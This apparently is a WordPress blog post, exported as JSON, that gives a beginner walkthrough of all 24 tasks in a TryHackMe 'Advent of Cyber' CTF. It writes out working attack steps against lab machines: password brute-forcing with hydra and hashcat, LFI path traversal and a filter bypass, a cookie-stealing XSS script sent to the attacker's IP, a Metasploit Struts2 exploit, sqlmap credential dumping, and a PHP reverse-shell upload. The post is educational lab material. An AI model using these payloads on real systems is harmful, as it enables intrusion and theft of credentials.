{"id":203,"date":"2020-06-12T23:53:29","date_gmt":"2020-06-12T15:53:29","guid":{"rendered":"https:\/\/byy3.com\/?p=203"},"modified":"2020-06-12T23:53:29","modified_gmt":"2020-06-12T15:53:29","slug":"advent-of-cyber-days25-thm","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=203","title":{"rendered":"Advent of Cyber days25 THM"},"content":{"rendered":"\n

Good day and merry Christmas, welcome to another THM CTF write-up. This is a special event created by THM where users have to solve all 24 tasks. Also, this room is specially designed for beginners who wish to learn more about basic hacking and pentesting. The task is easy with supporting material and it good for those have absolutely zero knowledge in hacking. The write-up gonna be tedious after the THM hackback 2019, so bear with me. You can click on the permalink to locate yourself to the specific challenge. Let\u2019s get started.<\/p>\n\n\n\n

Day1<\/a><\/li>
Day2<\/a><\/li>
Day3<\/a><\/li>
Day4<\/a><\/li>
Day5<\/a><\/li>
Day6<\/a><\/li>
Day7<\/a><\/li>
Day8<\/a><\/li>
Day9<\/a><\/li>
Day10<\/a><\/li>
Day11<\/a><\/li>
Day12<\/a><\/li>
Day13<\/a><\/li>
Day14<\/a><\/li>
Day15<\/a><\/li>
Day16<\/a><\/li>
Day17<\/a><\/li>
Day18<\/a><\/li>
Day19<\/a><\/li>
Day20<\/a><\/li>
Day21<\/a><\/li>
Day22<\/a><\/li>
Day23<\/a><\/li>
Day24<\/a><\/li><\/ul>\n\n\n\n
Day 1 (Task 6) \u2013 Hacking the cookie<\/h2>\n\n\n\n
The first task of the challenge is about hijacking the session by altering the cookie value. You need to register and login yourself first and I name this account as user mama<\/strong>. After that, press F12 and find the cookie.<\/p>\n\n\n\n
$\"Advent$ <\/figure>\n\n\n\n
For your information, the value is encoded with base64.<\/p>\n\n\n\n
$\"Advent$ <\/figure>\n\n\n\n
These first few characters contain the username mama<\/strong> while the rest is gibberish. Now, we are going to create a longer user name like hijackingthecookie<\/strong>.<\/p>\n\n\n\n
$\"Advent$ <\/figure>\n\n\n\n
By comparing the previously decoded cookie, the last 11 characters (censored) are fixed. To hijack into the mcinventory\u2019s account, simply encode the following text.<\/p>\n\n\n\n
mcinventory<the last 11 characters><\/code><\/pre>\n\n\n\nCopy the encoded text and paste on it.<\/p>\n\n\n\n<\/figure>\n\n\n\nRefresh the page and you got yourself inside mcinventory account.<\/p>\n\n\n\n<\/figure>\n\n\n\nDay 2 (Task 7): Directory brute-force and OSINT<\/h2>\n\n\n\nThis task involved two elements which are directory brute-force and OSINT. For this write-up, I\u2019m going to use gobuster with the following command.<\/p>\n\n\n\n gobuster dir -u http:\/\/<machine IP>:3000 -w \/usr\/share\/dirb\/wordlists\/common.txt<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nThere is one particular directory gain our interest. Visiting the hidden directory and reading the source code, we got the following.<\/p>\n\n\n\n <\/figure>\n\n\n\nTime to do a little bit of OSINT. Visit the legit GitHub<\/a> site and search for arctic digital design<\/strong>.<\/p>\n\n\n\n <\/figure>\n\n\n\nWe just hit the jackpot. Read the repo and you should find something interesting.<\/p>\n\n\n\n<\/figure>\n\n\n\nUse the credential and login to the admin portal. Don\u2019t forget to read the message.<\/p>\n\n\n\n<\/figure>\n\n\n\nDay 3 (Task 8): Reading packet<\/h2>\n\n\n\nDownload the packet file and read it using the Wireshark. Read packet ID 998 for the sake of the challenge.<\/p>\n\n\n\n<\/figure>\n\n\n\nTime to find something useful. To make things simple, it is good to follow the TCP stream. To do it, simply select any TCP packet, right-click and follow the TCP stream.<\/p>\n\n\n\n<\/figure>\n\n\n\nAll the information for the challenge is located on stream 1<\/strong>.<\/p>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\nTo crack buddy\u2019s hashed password, simply punch in the following command. (By referring to the hashcat example<\/a>, the hash is sha512crypt)<\/p>\n\n\n\n hashcat -a 0 -m 1800 hash \/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n\n\n\nIf you are running the hashcat on VM, put \u2013force<\/strong> flag.<\/p>\n\n\n\nDay 4 (Task 9): Linux challenge<\/h2>\n\n\n\nThis task going to test your understanding of the Linux command. Refer to the supporting material if you wanted to know more. Login into the machine via SSH shell.<\/p>\n\n\n\nTask9-1: visible files<\/h3>\n\n\n\n<\/figure>\n\n\n\nTask9-2: Read a file<\/h3>\n\n\n\n<\/figure>\n\n\n\nTask9-3: File the strings<\/h3>\n\n\n\n<\/figure>\n\n\n\nTask9-4: Find the IP address<\/h3>\n\n\n\n<\/figure>\n\n\n\nTask9-5: Check user<\/h3>\n\n\n\n<\/figure>\n\n\n\nTask9-6: File integrity<\/h3>\n\n\n\n<\/figure>\n\n\n\nTask9-7: Finding the hash<\/h3>\n\n\n\nFor your information, all user\u2019s hash is stored in \/etc\/shadow. The problem is, you can\u2019t simply read the file due to permission issues. Sometimes, you can find the backup somewhere inside the system folder.<\/p>\n\n\n\n <\/figure>\n\n\n\nWe have permission to read the backup file.<\/p>\n\n\n\n <\/figure>\n\n\n\nDay 5 (Task 10): OSINT<\/h2>\n\n\n\nDownload the picture and examine the metadata using ExifTool<\/strong>.<\/p>\n\n\n\n <\/figure>\n\n\n\nWe found a small piece of information regarding the creator\u2019s name. A quick google search on the name yielding the following twitter page.<\/p>\n\n\n\n <\/figure>\n\n\n\nVisting the WordPress by elf Lola redirect us to the following page<\/p>\n\n\n\n <\/figure>\n\n\n\nProblem is, how do we know the first photograph being published by Lola? Ever heard waybackmachine<\/a> where people like to dig back the old stuff. Copy and paste the link in the waybackmachine, you got the following list of the archive.<\/p>\n\n\n\n <\/figure>\n\n\n\nThe earliest date is on October. Click on the date and visit the archived page.<\/p>\n\n\n\n<\/figure>\n\n\n\nSomething is different compared to the latest one. To check with the lazy name, click onto the picture or do a reverse search using TinEye<\/a>.<\/p>\n\n\n\n <\/figure>\n\n\n\nDay 6 (Task 11): Extract files from the packet<\/h3>\n\n\n\nDownload the file and open it up with the Wireshark<\/strong>. Examine the UDP stream by right-clicking any DNS packet.<\/p>\n\n\n\n<\/figure>\n\n\n\nLooking at streams 2,3,4 and 5, you will come across something interesting.<\/p>\n\n\n\n<\/figure>\n\n\n\nThe data is encoded as base16 or hex. After that, in Wireshark navigate yourself File -> Export object -> HTTP and download the two files (.zip and .jpg)<\/p>\n\n\n\n<\/figure>\n\n\n\nThe zip is password protected. Use fcrackzip or john to crack the password. In this case, I used the john.<\/p>\n\n\n\nzip2john christmaslists.zip > hash<\/code><\/pre>\n\n\n\njohn hash<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nThere is another file hidden inside the Tryhackme.jpg. Use steghide<\/strong> (without the password) to extract the file.<\/p>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\nDay 7 (Task 12): Nmap<\/h2>\n\n\n\nLaunch your Nmap scanner with the following command<\/p>\n\n\n\n nmap -p0-1000 -A -v <machine IP><\/code><\/pre>\n\n\n\nRead all the available on the result screen and submit the answer.<\/p>\n\n\n\n <\/figure>\n\n\n\nDon\u2019t forget to check Port 999. There is something inside the server.<\/p>\n\n\n\n Day 8 (Task 13): SUID file exploit<\/h2>\n\n\n\nDo the Nmap fast scan using the following command<\/p>\n\n\n\n nmap -p- -v --min-parallelism 100 <machine IP><\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\nLook like we have something on port 65534, a further scan of the port is a result of open SSH. Login to the machine via SSH shell with the following command<\/p>\n\n\n\n ssh -p 65534 holly@<machine IP><\/code><\/pre>\n\n\n\nAfter that, search for SUID files.<\/p>\n\n\n\n find \/ -perm \/4000 2>\/dev\/null<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nWe found something interesting on the list of finding. By checking the find SUID from GTFObin<\/a>, we can escalate as user igor.<\/p>\n\n\n\n <\/figure>\n\n\n\nTo escalate as the root user, we need to find a suspicious SUID file. By looking at the timestamp, we found a recent SUID when the machine is created.<\/p>\n\n\n\n<\/figure>\n\n\n\nLet\u2019s run the command.<\/p>\n\n\n\n<\/figure>\n\n\n\nWe can literally do anything as the root by running the binary.<\/p>\n\n\n\nDay 9 (Task 14): Python requests<\/h2>\n\n\n\nVisiting the website will return the JSON result. Copy the following script and run it with python.<\/p>\n\n\n\n<\/figure>\n\n\n\nimport requests\nimport json\n\npath = \"f\"\nvalue = \"\"\nhost = \"https:\/\/10.10.112.87:3000\/\"\n\nwhile 1:\n\tresponse = requests.get(host + path)\n\tdict_data = json.loads(response.text)\n\tpath = dict_data[\"next\"]\n\tif path == \"end\":\n\t\tbreak\n\tvalue = value + dict_data[\"value\"]\n\n\nprint(value)<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nDay 10 (Task 15): Metasploit<\/h2>\n\n\n\nFirst of all, perform an Nmap scan and search for any possible open port.<\/p>\n\n\n\n<\/figure>\n\n\n\nLook like we have the webserver running on the machine. After that, do a Nikto scan on the webserver and search for any vulnerability.<\/p>\n\n\n\n <\/figure>\n\n\n\nThe server is vulnerable to strutshock or CVE-2017-5638<\/a>. By checking the information on the CVE, we understand that the vulnerable somehow related to the Jakarta Multipart parser in Apache Struts. Fire up our Metasploit with the following command.<\/p>\n\n\n\n msfconsole<\/code><\/pre>\n\n\n\nAfter that search for struts2 modules.<\/p>\n\n\n\n<\/figure>\n\n\n\nWe have located the vulnerability. Use the module and do the following configuration.<\/p>\n\n\n\nmsf5 > exploit\/multi\/http\/struts2_content_type_ognl\nmsf5 > set RHOST <machine IP>\nmsf5 > set RPORT 80\nmsf5 > set TARGETURI \/showcase.action\nmsf5 > set payload linux\/x86\/meterpreter\/reverse_tcp\nmsf5 > exploit<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nAnd get the open shell. Enumerate your way to \/home\/santa to capture the credentials. Remember, the machine you are currently exploiting is inside a docker which means you are not entirely controlling the machine even you are a root user. There is a way to escape the docker. Visit this room<\/a> to learn more.<\/p>\n\n\n\n Login to the SSH with the newly captured credentials. To extract the specific line from the file, simply input the following command.<\/p>\n\n\n\n sed '100q;d' naughty_list.txt<\/code><\/pre>\n\n\n\nThe above command extract the 100th line from the naughty_list.txt. Give it a try!<\/p>\n\n\n\n Day 11 (Task 16): Accessing the file system<\/h2>\n\n\n\nTask 16-1: NFS<\/h3>\n\n\n\nCheck the NFS of the server with the following command<\/p>\n\n\n\nshowmount -e <machine IP><\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nTo mount with the NFS, firstly create a directory named nfs after that mount the NFS with the following command.<\/p>\n\n\n\nmount <machine IP>:\/opt\/files \/root\/Desktop\/THM\/xmas\/nfs<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nRemember to unmount the nfs after you are done with the challenge.<\/p>\n\n\n\numount -f -l nfs<\/code><\/pre>\n\n\n\nTask 16-2: FTP<\/h3>\n\n\n\nVisit the FTP server with the following command.<\/p>\n\n\n\nFTP <machine IP><\/code><\/pre>\n\n\n\nLog in to the server with user anonymous<\/strong> with a blank password.<\/p>\n\n\n\n <\/figure>\n\n\n\nDownload the file with get<\/strong> and read the txt file for the SQL username and password.<\/p>\n\n\n\n Task 16-3: MySQL<\/h3>\n\n\n\nLogin to the SQL server with the following command.<\/p>\n\n\n\n mysql -u <username> -h 10.10.149.117 -p<password><\/code><\/pre>\n\n\n\nMake sure the -p is stick with the password (no space). After that, navigate and read the flag with the following SQL command.<\/p>\n\n\n\n mysql > SHOW DATABASES;\nmysql > USE data;\nmysql > SELECT * FROM USERS<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nDay 12 (Task 17): File decryption<\/h2>\n\n\n\nDownload and unzip the file. To do an md5 checksum on the file 1, simply use this command.<\/p>\n\n\n\n md5sum note1.txt.gpg<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nPunch in the command to decrypt the gpg file<\/p>\n\n\n\n gpg note1.txt.gpg<\/code><\/pre>\n\n\n\nThe password is 25daysofchristmas<\/strong><\/p>\n\n\n\n To decrypt the asymmetrically encrypted file with the private key, follow the following command.<\/p>\n\n\n\n openssl rsautl -decrypt -inkey private.key -in note2_encrypted.txt -out note2.txt<\/code><\/pre>\n\n\n\nThe password is hello<\/strong>.<\/p>\n\n\n\n Day 13 (Task 18): Capture the flag<\/h2>\n\n\n\nThis task is created by the darkstar. I named this task as CTF as it involves some enumeration, exploits and privilege escalation. You might encounter bugs while performing some recon and exploit. First and foremost, let\u2019s do a full scan on the server with ping skip.<\/p>\n\n\n\n nmap -Pn -A -v <machine IP><\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nWe have two services running on the machine, specifically port 80 (HTTP) and port 3389 (RDP). Let\u2019s do a visit to the HTTP server.<\/p>\n\n\n\n <\/figure>\n\n\n\nA default windows server welcome page. Huh\u2026 nothing we can do here except brute-forcing the server. Time to fire up our gobuster<\/p>\n\n\n\n gobuster dir -u <machine IP> -w \/usr\/share\/dirbuster\/wordlists\/directory-list-2.3-medium.txt<\/code><\/pre>\n\n\n\nAlright, we got an interesting directory called \/retro<\/strong>. Let\u2019s do some reading on the blog. After a short recon, I stumbled across the following in one of the blog posts.<\/p>\n\n\n\n <\/figure>\n\n\n\nIt could be the password for the webserver. Actually it is, you can log in into the WordPress dashboard with username wade<\/strong> and the password.<\/p>\n\n\n\n <\/figure>\n\n\n\nStop right there! There is nothing you can do with the WordPress dashboard that including generates a reverse shell page. Still, remember we have one more service yet to explore, the RDP. For this task, I\u2019m going to use remmina<\/strong> instead of rdesktop, this is because I faced some problems with connecting the server with rdesktop.<\/p>\n\n\n\n Using the username wade and the password you just found to log in to the RDP service.<\/p>\n\n\n\n <\/figure>\n\n\n\nWe are now inside the desktop. If you open up the google chrome and check on the bookmark bar, you come across a CVE number.<\/p>\n\n\n\n <\/figure>\n\n\n\nAfter a short google search on the CVE, I came across the following gif<\/a>. It explains how the exploit works. The executable is located inside the recycle bin, restore and run it. However, you will get the infamous grey ok button that stops you from proceeding with the exploit.<\/p>\n\n\n\n <\/figure>\n\n\n\nA big thanks to the creator of the room, darkstar. The grey button is intentioned for the challenge. The author mentioned the chrome is installed and set as default for administrator user. Such setup causes a glitch in the Windows Server 2016. There is a consistent fix for the glitch which opens up both Chrome and IE browsers and then launches the exploit<\/strong><\/p>\n\n\n\n Darkstar also mentioned there are two other usual ways on fixing the bug which is<\/p>\n\n\n\nPurely luck (My situation)<\/li>Spamming the okay button<\/li><\/ol>\n\n\n\n<\/figure>\n\n\n\nI have tested the above fix mentioned by darkstar it works like a charm.<\/p>\n\n\n\n<\/figure>\n\n\n\nDay 14 (Task 19): AWS<\/h2>\n\n\n\nSince we have the bucket name, it makes the thing quite simple. Visit the following URL<\/p>\n\n\n\nhttp://advent-bucket-one.s3.amazonaws.com\/<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nAfter that read the content inside the text file.<\/p>\n\n\n\n<\/figure>\n\n\n\nDay 15 (Task 20): Local file inclusion (LFI)<\/h2>\n\n\n\nVisit the website and look at the source code.<\/p>\n\n\n\n <\/figure>\n\n\n\nLook like the server pulling the text file from view\/notes directory. Take note to the URL directory which in charge of pulling the file, \/get-file\/. We need to draft a URL for pulling the \/etc\/passwd from the server.<\/p>\n\n\n\n http:\/\/<machine IP>\/get-file\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\n\n\n\nPut the return directory symbol (..\/) as much as you like, the more the better. we are doing directory traverse now.<\/p>\n\n\n\n <\/figure>\n\n\n\nWe have a situation right now. To bypass the filter, try URL encoding by changing the \u2018\/\u2019 into %2f.<\/p>\n\n\n\n http:\/\/<machine IP>\/get-file\/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nNow we talking. Find charlie\u2019s hash file from the shadow file.<\/p>\n\n\n\n <\/figure>\n\n\n\nCopy the hash and crack it using hashcat.<\/p>\n\n\n\n hashcat -a 0 -m 1800 hash \/usr\/share\/wordlists\/rockyou.txt --force<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nAfter cracking the hash, login to user Charlie\u2019s ssh shell and capture the flag.<\/p>\n\n\n\n <\/figure>\n\n\n\nDay 16 (Task 21): Python file system<\/h2>\n\n\n\nYou are required to write a python to unzip, calculate and find the content of files. Make sure you understand the code.<\/p>\n\n\n\n Task 21-1: Count the number of the unzipped file<\/h3>\n\n\n\nThe following is the python code for the task.<\/p>\n\n\n\n import zipfile\nimport os\n\ncount = 0\n\n#Extract the primary file\nwith zipfile.ZipFile('final-final-compressed.zip','r') as zip_decom1:\n\tzip_decom1.extractall('decom1')\n\n#read and extract each zip file to decom2\nListFile = os.listdir('decom1')\nfor l in ListFile:\n\twith zipfile.ZipFile('decom1\/' + l,'r') as zip_decom2:\n\t\tzip_decom2.extractall('decom2')\n\n# calculate the number of file (exclude .zip)\nListFile = os.listdir('decom2')\nfor l in ListFile:\n\tif 'zip' not in l:\n\t\tcount = count + 1\nprint(\"Number of extracted file: \" + str(count))<\/code><\/pre>\n\n\n\nTask 21-2: Find the file with specific metadata<\/h3>\n\n\n\nThis task requires the challenger to find the number of files labeled with Version 1.1.<\/p>\n\n\n\n mport os\nimport exiftool\n\nm_count = 0\nfile = []\n\n# Read all the metadata in decom2 and scan for 'version 1.1' metadata\nListFile = os.listdir('.\/')\nfor l in ListFile:\n file.append(l)\n\nwith exiftool.ExifTool() as et:\n metadata = et.get_metadata_batch(file)\nfor d in metadata:\n try:\n if(d[u'XMP:Version']):\n m_count = m_count + 1\n except:\n continue\n\nprint(\"Number of files in version 1.1: \" + str(m_count))<\/code><\/pre>\n\n\n\nPut the script inside the decom2 directory.<\/strong><\/p>\n\n\n\n Task 21-3: Find the file with specific content<\/h3>\n\n\n\nYour task is to find the file with the string, \u2018password\u2019.<\/p>\n\n\n\n import os\n\n# read all file in decom 2 and find the file with 'password'\nListFile = os.listdir('decom2')\nfor l in ListFile:\n\tf = open('decom2\/' + l,'r')\n\tdata = f.read()\n\tf.close()\n\t\n\tif \"password\" in data:\n\t\tprint(l)<\/code><\/pre>\n\n\n\nDay 17 (Task 22): Hydra<\/h2>\n\n\n\n Task 22-1: Brute-force the HTTP-post-form<\/h3>\n\n\n\nThe hint is a joke, do not trust it. The password is located around 900k+ in rockyou.txt. I will make another exception for this task by revealing the password.<\/p>\n\n\n\n hydra -l molly -p joyness1994 <machine IP> http-post-form \"\/login:username=^USER^&password=^PASS^:F=incorrect\"<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\nLogin molly\u2019s credentials on the webpage and capture the flag.<\/p>\n\n\n\n <\/figure>\n\n\n\nTask 22-2: Brute-force the SSH<\/h3>\n\n\n\nUse the following command to brute-force the SSH service.<\/p>\n\n\n\n hydra -t 64 -l molly -P \/usr\/share\/wordlists\/rockyou.txt ssh:\/\/<machine IP><\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nLogin into the server and capture the flag.<\/p>\n\n\n\n <\/figure>\n\n\n\nDay 18 (Task 23): Stealing the cookie<\/h2>\n\n\n\nThere is a lot of ways of solving this task. As for my approach, I\u2019m going to create a PHP script and steal the admin cookie. For the sake of simplicity, the script only contains one single line and extremely unrealistic<\/strong>.<\/p>\n\n\n\n <?php\n $cookie = $_GET[\"c\"];\n?><\/code><\/pre>\n\n\n\nAfter that, launch the PHP server (run the command inside the directory contains the PHP script) to listen to any incoming request.<\/p>\n\n\n\n php -S <tun IP>:8000<\/code><\/pre>\n\n\n\nmake sure you change the tun IP according to your own VPN IP in THM<\/a>. After that , register yourself in the webserver and inject the following script in the comment section.<\/p>\n\n\n\n <script>document.location='https:\/\/<tun IP>:8000\/cookie.php?c='+document.cookie;<\/script><\/code><\/pre>\n\n\n\nChange the tunnel IP too.<\/p>\n\n\n\n<\/figure>\n\n\n\nWait for 2 minutes and the admin \u2018s cookie will show in front of your screen.<\/p>\n\n\n\n<\/figure>\n\n\n\nDay 19 (Task 24): Command injection<\/h2>\n\n\n\nAlmost similar to the local file inclusion (task 20)<\/a>, you gonna play around with the URL. For starter, let\u2019s test the injection with the following URL.<\/p>\n\n\n\n http:\/<machine IP>:3000\/api\/cmd\/ls<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nThe result contains a list of the main file system directory. By doing a small recon, the flag is located at \/home\/bestadmin<\/p>\n\n\n\n<\/figure>\n\n\n\nRead the file and capture the flag.<\/p>\n\n\n\n<\/figure>\n\n\n\nDay 20 (Task 25): Cronjob<\/h2>\n\n\n\nFirst and foremost, do a Nmap scan.<\/p>\n\n\n\nnmap -p4000-5000 -A -v <machine IP><\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nLook like we have port 4567 (SSH) service running on the machine. As for the next task, we need to brute force the service with username sam.<\/p>\n\n\n\nhydra -s 4567 -t 64 -l sam -P \/usr\/share\/wordlists\/rockyou.txt ssh:\/\/<machine IP><\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nWe got the password. Time to login to the shell.<\/p>\n\n\n\n <\/figure>\n\n\n\nThere is one particular script in \/home\/scripts that raises suspicion to us. Let\u2019s read the content.<\/p>\n\n\n\n <\/figure>\n\n\n\nThe script just doing some cleaning on the \/tmp. How does it look suspicious? Let\u2019s check the timestamp of \/tmp.<\/p>\n\n\n\n <\/figure>\n\n\n\nDid you see the time differences? It is very close. My hypothesis is the clean_up.sh is inside the cronjob list from the user ubuntu. Let\u2019s see what is our permission on the script.<\/p>\n\n\n\n <\/figure>\n\n\n\nWell, we can temper the script as a low-privilege user. For your information, you can\u2019t privilege escalate as the root user yet because the file belongs to ubuntu. You can use the following command to pull the flag from the ubuntu.<\/p>\n\n\n\n echo \"cat \/home\/ubuntu\/flag2.txt > \/home\/scripts\/flag2.txt\" > clean_up.sh<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nDay 21 (Task 26): Reverse engineering (basic)<\/h2>\n\n\n\nI\u2019m going to use IDA reverse engineering tool for the entire RE challenge. You can refer to my ELF RE write-up <\/a>to know more about IDA. Check challenge1 for the challenge. file1 is a decoy.<\/p>\n\n\n\n Task 26-1: static analysis<\/h3>\n\n\n\n<\/figure>\n\n\n\nTask 26-2: Debugging 1<\/h3>\n\n\n\nPut a breakpoint (Pressing F2) after imul instruction.<\/p>\n\n\n\n<\/figure>\n\n\n\nRun the program (green play button) and hover to the eax register for the answer.<\/p>\n\n\n\nTask 26-3: Debugging 2<\/h3>\n\n\n\nPut a breakpoint (Pressing F2) before the pop instruction.<\/p>\n\n\n\n<\/figure>\n\n\n\nRun the program (green play button) and hover to the var_4 or eax for the answer.<\/p>\n\n\n\nDay 22 (Task 27): Reverse engineering (conditional)<\/h2>\n\n\n\nThis RE task involved with if conditional sentence.<\/p>\n\n\n\n<\/figure>\n\n\n\nThe branch translated as<\/p>\n\n\n\nvar_8 = 8\nvar_4 = 2\n\nif (var_8 < var_4)\n{\n var_4 += 7\n}\nelse\n{\n var_8 += 1\n}<\/code><\/pre>\n\n\n\nSince var_8 is always bigger than var_4, it made the if statement<\/strong> false. The branch will follow the red wire. By wrapping this up, you should get the answers.<\/p>\n\n\n\n Day 23 (Task 29): SQL injection<\/h2>\n\n\n\nFor this SQli, I\u2019m going for the easy way. First and foremost, Launch the burp suite and visit the LapLand login page. After that, try to login as a random user (invalid credential) and capture the request from the burp suite.<\/p>\n\n\n\n <\/figure>\n\n\n\nCopy the request and save it as r.txt<\/strong>. After that, run the following command to initiate the injection to find out the list of the possible database.<\/p>\n\n\n\n sqlmap -r r.txt --dbs --batch<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\nWe got one particular parameter that is vulnerable to the injection. After a short run, we are able to determine the databases. The next step is to list all the tables inside the database (name censored) with the following command.<\/p>\n\n\n\n sqlmap -r r.txt -D <Censored Db name> --table --batch<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nLooks like we found a list of tables. For this time being, we are only interested in the last table. As for the next step, enumerate the content inside the table.<\/p>\n\n\n\n sqlmap -r r.txt -D <Censored Db name> -T <Censored table name> --column --batch<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nLet\u2019s pull some data from the column. You are required to use \u2013dump.<\/p>\n\n\n\n sqlmap -r r.txt -D <Censored DB name> -T <Censored table name> -C email,username,password --batch --dump<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nWe just found Santa\u2019s email and hashed password from the database. I strongly recommend you to skip the hash cracking part. Simply copy Santa\u2019s MD5 hash and crack it using the online tool<\/a>. Now, we are able to login to Santa\u2019s social account.<\/p>\n\n\n\n <\/figure>\n\n\n\nBy the way, there is one secret inside Santa\u2019s inbox.<\/p>\n\n\n\n<\/figure>\n\n\n\nAlright, time to reverse the shell. Firstly, download the PHP reverse shell payload via this page<\/a>. Save the file as .phtml<\/strong> instead of .php as the standard PHP filename has been filtered by the page. Before upload and submit the payload, make sure you have the listener opened in your terminal.<\/p>\n\n\n\n nc -lvnp 1234<\/code><\/pre>\n\n\n\nAfter uploading the file, locate the following URL.<\/p>\n\n\n\nhttp:\/\/<machine IP>\/assets\/images\/posts\/<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nClick on the .phtml file we just uploaded and listen to the shell.<\/p>\n\n\n\n<\/figure>\n\n\n\nThe flag is located at \/home\/user<\/p>\n\n\n\n<\/figure>\n\n\n\nDay 24: ELF (Elastic Search, Kibana and Log Stash )<\/h2>\n\n\n\nFirst and foremost, launch your Nmap scanner.<\/p>\n\n\n\n Looks like we found Port 22 (SSH), Port 8000 (HTTP) and Port 9200 (Elasticsearch) on the target machine. For your information, you can\u2019t log in to the SSH and the only way in is Port 8000 and Port 9200. Let\u2019s do a check on Port 9200.<\/p>\n\n\n\nThere is one good material<\/a> to kick start with the port 9200. To pull the password from the database, simply do a query search.<\/p>\n\n\n\n http:\/\/<machine IP>:9200\/_search?q=password <\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nThere is nothing you can do with the credential, let\u2019s proceed to port 8000. In the port, there is something called the Kibana log. By looking at the log, I stumbled across another open service on port 5601<\/p>\n\n\n\n<\/figure>\n\n\n\nAfter doing the Nmap scan, port 5601 can be accessed via the browser.<\/p>\n\n\n\n<\/figure>\n\n\n\nLet\u2019s check the version in the management tab.<\/p>\n\n\n\n<\/figure>\n\n\n\nAfter doing a quick google search on the Kibana version, I came across the LFI attack CVE-2018-17246<\/a>. I try to locate the following payload address to validate vulnerably.<\/p>\n\n\n\n http:\/\/<machine IP>:5601\/api\/console\/api_server?sense_version=@@SENSE_VERSION&apis=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\n\n\n\nAfter that, revisit the log file from port 8000, you will notice something interesting.<\/p>\n\n\n\n <\/figure>\n\n\n\nWe just read the content from \/etc\/passwd. This vulnerable is valid. As for the flag, it is located at the root file system (Not in the \/root directory).<\/p>\n\n\n\n http:\/\/<machine IP>:5601\/api\/console\/api_server?sense_version=@@SENSE_VERSION&apis=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/root.txt<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nIt is hard to locate the flag as it only contains a few letters. Well, actually there are other ways by using the console.<\/p>\n\n\n\n Conclusion<\/h2>\n\n\n\nThis is it, congratulation on completing all 24 tasks. What a challenge! A big thanks to the THM and the task creators who create those challenges we didn\u2019t deserve for. Good job and keep on keeping on, I look forward to the next cyber advent challenge. Until next time ^^ and happy new year.<\/p>\n","protected":false},"excerpt":{"rendered":" Good day and merry Christmas, welcome to another THM CT […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-203","post","type-post","status-publish","format-standard","hentry","category-net-security"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/203","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=203"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/203\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=203"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=203"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=203"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

Day 11 (Task 16): Accessing the file system<\/h2>\n\n\n\n

Day 16 (Task 21): Python file system<\/h2>\n\n\n\n
You are required to write a python to unzip, calculate and find the content of files. Make sure you understand the code.<\/p>\n\n\n\n

Day 17 (Task 22): Hydra<\/h2>\n\n\n\n

Day 21 (Task 26): Reverse engineering (basic)<\/h2>\n\n\n\n
I\u2019m going to use IDA reverse engineering tool for the entire RE challenge. You can refer to my ELF RE write-up <\/a>to know more about IDA. Check challenge1 for the challenge. file1 is a decoy.<\/p>\n\n\n\n

Day 11 (Task 16): Accessing the file system<\/h2>\n\n\n\n

Day 16 (Task 21): Python file system<\/h2>\n\n\n\nYou are required to write a python to unzip, calculate and find the content of files. Make sure you understand the code.<\/p>\n\n\n\n

Day 17 (Task 22): Hydra<\/h2>\n\n\n\n

